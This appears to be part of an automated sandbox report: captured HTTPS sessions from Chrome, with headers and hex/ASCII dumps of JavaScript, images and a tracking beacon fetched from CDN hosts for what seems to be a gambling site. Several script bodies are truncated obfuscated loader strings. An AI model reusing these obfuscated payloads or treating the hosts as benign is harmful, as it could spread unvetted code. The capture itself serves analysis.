                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAnADlwF0AaAbwCIAGAMQBMwKAuAMwFc0YAXAS3UxAkuJNAEpKbJCAAESLgCce3CgG4A8mABWIbgDo6IFjzQgACvJQQQ8rgE9MwigH0nIJAFkUdNgBsQFcgA3KB82ECYAQioAX1EVYPlpKABeNEwKABE6fGAKURIUVN00qHyeVPSqGAgWPJIkCooAOQBNAA81OvlkzBRMUUwyaJINbW5MJF0AWy


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          423192.168.2.55019290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:13 UTC562OUTGET /pc/240516-03/static/js/components/383/footerImg.js HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:13 UTC629INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:13 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 800
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:39 GMT
                                                                                                                                                          ETag: "6645cabf-320"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[14],EU-GER-frankfurt-EDGE5-CACHE3[0,TCP_HIT,11],EU-FRA-paris-GLOBAL1-CACHE25[5],EU-FRA-paris-GLOBAL1-CACHE21[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2467545
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: fbdec9affad7a183b91c7e2a63c41e2d
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 124455
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:13 UTC800INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6e 41 4a 67 48 59 42 64 41 47 67 47 38 42 31 41 46 67 43 30 41 5a 41 4c 67 44 4d 42 58 4e 47 41 46 77 45 74 31 4e 50 53 49 41 4a 54 6b 41 76 71 51 42 65 41 52 69 67 67 57 37 4c 72 7a 54 39 42 70 4e 43 49 42 45 72 4a 43 41 41 45 53 54 67 43 64 75 58 44 51 47 34 41 38 6d 41 42 57 49 4c 67 44 6f 41 4a 69 47 62 63 30 49 41 41 71 47 55 45 45 49 63 34 41 6e 70 67 67 70 42 6f 41 2b 6d 45 67 53 41 43 79 4b 49 36 73 41 44 59 67 47 68 51 41 62 6c 41 4a 72 48 49 41 68 41 41 4d 6f 6b 4a 6d 36 59 61 36 33 41 43 38 79 68 71 35 4d 42 44 4d 47 6b 4b 6b 4d 47 58 6b 6a 6c 43 63 55 50 49 63 50 48 77 69 68 69 43 63 72 49 5a 6f 35 45 69 47 4d 49 77 61 4b 54 43 4f
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAnAJgHYBdAGgG8B1AFgC0AZALgDMBXNGAFwEt1NPSIAJTkAvqQBeARiggW7LrzT9BpNCIBErJCAAESTgCduXDQG4A8mABWILgDoAJiGbc0IAAqGUEEIc4AnpggpBoA+mEgSACyKI6sADYgGhQAblAJrHIAhAAMokJm6Ya63AC8yhq5MBDMGkKkMGXkjlCcUPIcPHwihiCcrIZo5EiGMIwaKTCO


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          424192.168.2.55019190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:13 UTC566OUTGET /pc/240516-03/static/js/components/383/footerService.js HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:13 UTC626INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:13 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 932
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:39 GMT
                                                                                                                                                          ETag: "6645cabf-3a4"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[4],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE1[3],EU-FRA-paris-GLOBAL1-CACHE10[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2467545
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: c968aa913548093a01677ec6779db418
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 124455
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:13 UTC932INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6e 41 46 67 44 59 42 64 41 47 67 47 38 42 6c 41 44 6a 41 42 55 41 75 41 4d 77 46 63 30 59 41 58 41 53 33 55 77 39 4c 51 42 4b 63 67 46 38 42 41 42 6a 67 42 50 5a 6d 30 34 38 30 66 41 61 52 44 43 41 52 43 79 51 67 41 42 45 67 34 41 6e 4c 70 7a 55 42 75 41 50 4a 67 41 56 69 45 34 41 36 41 43 59 67 6d 58 4e 43 41 41 4b 2b 6c 42 42 44 36 4f 55 7a 47 69 6b 61 67 44 36 77 53 42 49 41 4c 49 6f 39 69 77 41 4e 69 42 71 46 41 42 75 55 4c 45 73 49 41 77 41 68 4f 49 69 67 69 59 70 2b 74 70 63 41 4c 77 67 6d 47 72 69 4d 42 42 4d 61 6f 4b 6b 4d 4d 58 6b 39 6c 41 63 55 4c 4c 73 33 4c 7a 43 2b 69 41 63 4c 50 70 6f 35 46 77 63 49 41 43 32 53 41 7a 59 5a 45 62
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAnAFgDYBdAGgG8BlADjABUAuAMwFc0YAXAS3Uw9LQBKcgF8BABjgBPZm0480fAaRDCARCyQgABEg4AnLpzUBuAPJgAViE4A6ACYgmXNCAAK+lBBD6OUzGikagD6wSBIALIo9iwANiBqFABuULEsIAwAhOIigiYp+tpcALwgmGriMBBMaoKkMMXk9lAcULLs3LzC+iAcLPpo5FwcIAC2SAzYZEb


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          425192.168.2.55019090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:13 UTC562OUTGET /pc/240516-03/static/js/components/383/footerNav.js HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:13 UTC628INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:13 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 4220
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:39 GMT
                                                                                                                                                          ETag: "6645cabf-107c"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[6],EU-GER-frankfurt-EDGE5-CACHE3[0,TCP_HIT,4],EU-FRA-paris-GLOBAL1-CACHE24[3],EU-FRA-paris-GLOBAL1-CACHE9[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2467545
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 09ef1680e737f02e04212f8766a4baba
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 124455
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:13 UTC4220INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 48 41 56 67 48 59 42 64 41 47 67 47 38 41 69 41 57 51 48 6f 49 42 62 53 67 4c 67 44 4d 42 58 4e 47 41 46 77 45 74 31 4d 53 55 74 77 43 55 35 41 4c 36 6b 41 47 6e 41 44 4b 73 74 70 78 37 38 30 67 34 61 53 68 6a 4b 37 4a 43 41 41 45 53 62 67 43 64 65 50 53 67 47 34 41 38 6d 41 42 57 49 48 67 44 6f 41 4a 69 46 61 38 30 49 41 41 70 47 55 45 45 45 65 34 41 54 30 78 75 55 6b 6f 41 66 58 43 51 4a 47 6f 55 4a 33 59 41 47 78 42 4b 43 67 41 33 4b 41 54 32 45 47 59 41 51 67 41 47 63 52 46 7a 64 4b 4d 39 64 67 42 65 4b 45 78 4b 50 4a 67 49 56 6b 6f 52 55 6c 54 79 38 69 63 6f 62 69 68 46 4c 6a 34 42 4d 53 4d 51 62 6e 59 6a 4e 48 49 30 4b 46 54 6d 62 44 49
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAHAVgHYBdAGgG8AiAWQHoIBbSgLgDMBXNGAFwEt1MSUtwCU5AL6kAGnADKstpx780g4aShjK7JCAAESbgCdePSgG4A8mABWIHgDoAJiFa80IAApGUEEEe4AT0xuUkoAfXCQJGoUJ3YAGxBKCgA3KAT2EGYAQgAGcRFzdKM9dgBeKExKPJgIVkoRUlTy8icobihFLj4BMSMQbnYjNHI0KFTmbDI


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          426192.168.2.550177103.117.134.214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:13 UTC425OUTGET /zb-cloud/stat.do?pv=ajax&pa=host.info&domain=yh8613.cc&terminal=1&r=3506563745 HTTP/1.1
                                                                                                                                                          Host: ocsapi-lc.tingmeikj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:13 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:13 UTC23INData Raw: 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 30 0d 0a
                                                                                                                                                          Data Ascii: Server: Tengine/2.3.0
                                                                                                                                                          2024-06-09 22:41:13 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 31 33 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:13 GMT
                                                                                                                                                          2024-06-09 22:41:13 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: text/plain;charset=utf-8
                                                                                                                                                          2024-06-09 22:41:13 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:13 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:13 UTC16INData Raw: 61 70 69 2d 65 6c 61 70 73 65 64 3a 20 36 0d 0a
                                                                                                                                                          Data Ascii: api-elapsed: 6
                                                                                                                                                          2024-06-09 22:41:13 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:41:13 UTC34INData Raw: 78 2d 73 65 72 76 65 72 3a 20 41 6b 61 6d 61 69 4e 65 74 53 74 6f 72 61 67 65 28 6a 70 31 35 29 0d 0a
                                                                                                                                                          Data Ascii: x-server: AkamaiNetStorage(jp15)
                                                                                                                                                          2024-06-09 22:41:13 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:13 UTC82INData Raw: 58 2d 56 69 61 3a 20 31 2e 31 20 61 77 73 3a 6a 70 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 2c 20 31 2e 31 20 6f 63 73 61 70 69 3a 30 30 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 0d 0a
                                                                                                                                                          Data Ascii: X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          427192.168.2.55020090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:13 UTC383OUTGET /pc/image-pc/index/312/parner/logo_bolin.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:13 UTC615INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:13 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 5512
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:56 GMT
                                                                                                                                                          ETag: "5d71fe88-1588"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[2],EU-GER-frankfurt-EDGE5-CACHE6[0,TCP_HIT,0],EU-FRA-paris-GLOBAL1-CACHE30[4],EU-FRA-paris-GLOBAL1-CACHE6[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465111
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: fa09d3551eccceed1542f64a9ec24179
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126892
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:13 UTC5512INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 35 00 00 00 32 08 06 00 00 00 fc e3 93 c8 00 00 15 4f 49 44 41 54 68 43 c5 9a 07 74 54 d5 ba 80 bf 53 26 99 09 e9 85 84 84 24 84 d0 42 11 a4 2a 3d 70 83 62 10 04 21 4a 10 a4 eb 43 8a 41 44 89 08 c8 15 a4 28 c2 25 a0 17 90 48 97 2a a0 d2 a4 e8 43 10 11 69 c2 a3 87 40 48 80 84 10 32 49 26 33 73 66 ce 7e eb 4c 40 bd 8a 22 3c d6 7a 67 ad ac c9 9c d9 fb 3f ff b7 f7 df f6 3f 23 71 fb 72 0a 67 13 13 a6 86 2e 97 3d db 64 b2 ec 3e 71 e2 84 57 7c bd 7a 51 aa dd 15 a7 4a ee da 28 6a 12 92 dc 08 45 32 df 9e 52 a2 bb d9 2d 2b ec d1 34 b2 1c 8e d2 cb be be be 05 92 24 89 3b 32 ff bf 5e 25 21 44 25 70 7f bc 73 d7 ae 9e 59 17 b2 cc 35 ab c5 b9 13 93 9e d8 95 97 7f 23 24 eb d2 a5 ea f9 79 b9 41 85 f9 05 5c ce cd e3
                                                                                                                                                          Data Ascii: PNGIHDR52OIDAThCtTS&$B*=pb!JCAD(%H*Ci@H2I&3sf~L@"<zg??#qrg.=d>qW|zQJ(jE2R-+4$;2^%!D%psY5#$yA\


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          428192.168.2.55020190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:13 UTC383OUTGET /pc/image-pc/index/312/parner/logo_italy.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:13 UTC615INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:13 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 5894
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:56 GMT
                                                                                                                                                          ETag: "5d71fe88-1706"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[2],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,0],EU-FRA-paris-GLOBAL1-CACHE19[3],EU-FRA-paris-GLOBAL1-CACHE4[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465111
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 5e64e4f2ba510b35c68ac16cf9f6f872
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126892
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:13 UTC5894INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 29 00 00 00 3b 08 06 00 00 00 e6 7e a3 66 00 00 16 cd 49 44 41 54 68 43 9d 5a 09 78 55 d5 b5 fe f7 19 ef 98 9b dc 4c 64 24 48 20 21 61 26 06 30 da 06 5a fb 69 65 30 4c a9 d0 3a d4 aa 8f a2 3e e5 21 4e af 12 5a 4d ad 20 85 84 41 06 27 04 b5 50 25 48 a1 b5 a2 e0 50 b1 8a 32 18 94 39 21 01 12 32 90 3b df 73 ef 19 f6 fb f6 b9 b9 90 10 9e b6 3d df 77 e1 dc 93 73 f6 fe cf 5a 6b ff eb 5f 6b 5f 82 ff ec 20 f1 c7 28 ad ba 74 ce ae 2d 06 50 84 a2 4b d7 66 9a 37 7e 43 81 45 94 10 f3 32 fd 77 a7 ec 35 c1 f7 3c 4c f6 ec d9 c3 e7 e5 e5 09 8d 8d 8d 82 cf e7 23 a2 e8 27 81 80 64 8e d1 85 2e 48 c1 d8 79 cf 23 31 11 08 06 45 c3 ed 06 72 73 47 1a 76 bb 5d 6b 6c 6c d4 ca cb 27 e8 84 fc 6b 80 bf 17 64 55 55 15 b7 68 d1
                                                                                                                                                          Data Ascii: PNGIHDR);~fIDAThCZxULd$H !a&0Zie0L:>!NZM A'P%HP29!2;s=wsZk_k_ (t-PKf7~CE2w5<L#'d.Hy#1ErsGv]kll'kdUUh


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          429192.168.2.55019990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:13 UTC401OUTGET /fiximg/ac-20200404/fileupload/ll12/202307/202307192352577.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:13 UTC569INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:13 GMT
                                                                                                                                                          Content-Type: application/json
                                                                                                                                                          Content-Length: 27136
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[5],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,3],EU-GER-frankfurt-GLOBAL1-CACHE6[563],EU-GER-frankfurt-GLOBAL1-CACHE5[421,TCP_MISS,563],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 8b5ad1e612ab026b945045398efab70e
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1012047
                                                                                                                                                          X-CCDN-Expires: 1579953
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:13 UTC15815INData Raw: 75 39 6d 45 50 55 47 69 48 6c 45 6d 54 43 67 74 46 76 45 6e 33 71 50 46 54 30 2b 39 34 4e 63 74 6c 38 4d 42 72 4b 4d 62 35 67 33 69 36 78 44 54 79 76 47 31 53 46 6e 38 31 37 74 31 36 34 4e 6d 5a 4d 6d 4d 46 30 6f 68 37 36 32 47 64 30 42 41 70 4a 66 52 72 68 35 51 49 33 34 33 71 4e 37 74 65 4f 6e 76 42 56 5a 4e 58 6f 73 79 6f 64 75 75 70 76 6f 70 78 4e 72 66 59 6d 79 46 67 66 61 56 70 72 2f 6c 69 2f 68 34 35 56 75 43 41 74 62 6b 66 4e 52 51 4e 33 4f 4a 4a 4e 58 7a 49 4e 54 70 36 52 41 6d 39 75 2f 41 42 43 37 70 78 56 6d 31 73 79 55 79 43 49 5a 41 38 4e 68 67 70 72 63 58 32 53 6c 42 77 63 6b 46 49 6b 44 45 48 4f 6c 38 4c 44 51 31 78 66 74 47 45 69 31 58 68 34 50 66 6f 53 76 39 6b 78 4b 72 61 6d 4c 54 34 70 65 33 6f 6e 48 4a 53 6a 51 2b 6e 6e 35 72 61 69 45
                                                                                                                                                          Data Ascii: u9mEPUGiHlEmTCgtFvEn3qPFT0+94Nctl8MBrKMb5g3i6xDTyvG1SFn817t164NmZMmMF0oh762Gd0BApJfRrh5QI343qN7teOnvBVZNXosyoduupvopxNrfYmyFgfaVpr/li/h45VuCAtbkfNRQN3OJJNXzINTp6RAm9u/ABC7pxVm1syUyCIZA8NhgprcX2SlBwckFIkDEHOl8LDQ1xftGEi1Xh4PfoSv9kxKramLT4pe3onHJSjQ+nn5raiE
                                                                                                                                                          2024-06-09 22:41:13 UTC11321INData Raw: 4e 6f 73 66 71 6b 36 53 4c 51 4a 67 30 59 6c 46 36 79 6a 36 6d 61 43 36 41 56 49 36 58 33 77 50 33 66 30 42 4e 76 48 56 63 53 45 32 69 78 2b 71 54 70 49 74 41 6d 44 52 69 54 62 78 31 58 45 68 4e 6f 73 66 71 6b 36 53 4c 51 4a 67 30 59 6b 32 38 64 56 78 49 54 61 4c 48 36 70 4f 6b 69 30 43 59 4e 47 4a 4e 76 48 56 63 53 45 32 69 78 2b 71 54 70 49 74 41 6d 44 52 69 54 62 78 31 58 45 68 4e 6f 73 66 71 6b 36 53 4c 51 4a 67 30 59 6b 32 38 64 56 78 49 54 61 4c 48 36 70 4f 6b 69 30 43 59 4e 47 4a 4e 76 48 56 63 53 45 32 69 78 2b 71 54 70 49 74 41 6d 44 52 69 51 4d 6f 4d 73 6a 68 34 71 75 55 46 54 78 6c 39 70 36 5a 31 62 55 32 38 64 56 78 49 54 61 4c 48 36 70 4f 6b 69 30 43 59 4e 47 4a 4e 76 48 56 63 53 45 32 69 78 2b 71 54 70 49 74 41 6d 44 52 69 54 62 78 31 58 45
                                                                                                                                                          Data Ascii: Nosfqk6SLQJg0YlF6yj6maC6AVI6X3wP3f0BNvHVcSE2ix+qTpItAmDRiTbx1XEhNosfqk6SLQJg0Yk28dVxITaLH6pOki0CYNGJNvHVcSE2ix+qTpItAmDRiTbx1XEhNosfqk6SLQJg0Yk28dVxITaLH6pOki0CYNGJNvHVcSE2ix+qTpItAmDRiQMoMsjh4quUFTxl9p6Z1bU28dVxITaLH6pOki0CYNGJNvHVcSE2ix+qTpItAmDRiTbx1XE


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          430192.168.2.55020323.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
